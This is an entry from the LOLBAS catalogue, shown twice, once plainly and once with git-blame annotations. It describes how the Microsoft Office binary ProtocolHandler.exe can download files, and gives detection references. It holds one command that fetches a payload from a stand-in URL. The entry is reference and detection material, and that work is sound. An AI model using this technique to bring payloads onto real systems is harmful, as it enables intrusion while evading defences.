LOLBAS/yml/OtherMSBinaries/ProtocolHandler.yml

---
Name: ProtocolHandler.exe
Description: Microsoft Office binary
Author: Nir Chako
Created: 2022-07-24
Commands:
  - Command: ProtocolHandler.exe https://example.com/payload
    Description: Downloads payload from remote server
    Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml
  - IOC: Suspicious Office application Internet/network traffic
Acknowledgement:
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'
Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-10-04 13:13:56 +02:00			`---`
			`Name: ProtocolHandler.exe`
			`Description: Microsoft Office binary`
			`Author: Nir Chako`
			`Created: 2022-07-24`
			`Commands:`
			`- Command: ProtocolHandler.exe https://example.com/payload`
			`Description: Downloads payload from remote server`
Update ProtocolHandler.yml (#267) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2023-06-17 23:18:06 +02:00			`Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"`
Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-10-04 13:13:56 +02:00			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
			`OperatingSystem: Windows 10, Windows 11`
			`Full_Path:`
			`- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe`
			`- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe`
			`- Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe`
			`- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe`
			`- Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe`
			`Detection:`
$frack113$ Add Sigma ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-06-10 08:12:12 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml`
Adding 3 Microsoft Office-based downloaders (#238) Co-authored-by: Wietze <wietze@users.noreply.github.com> 2022-10-04 13:13:56 +02:00			`- IOC: Suspicious Office application Internet/network traffic`
			`Acknowledgement:`
			`- Person: Nir Chako (Pentera)`
			`Handle: '@C_h4ck_0'`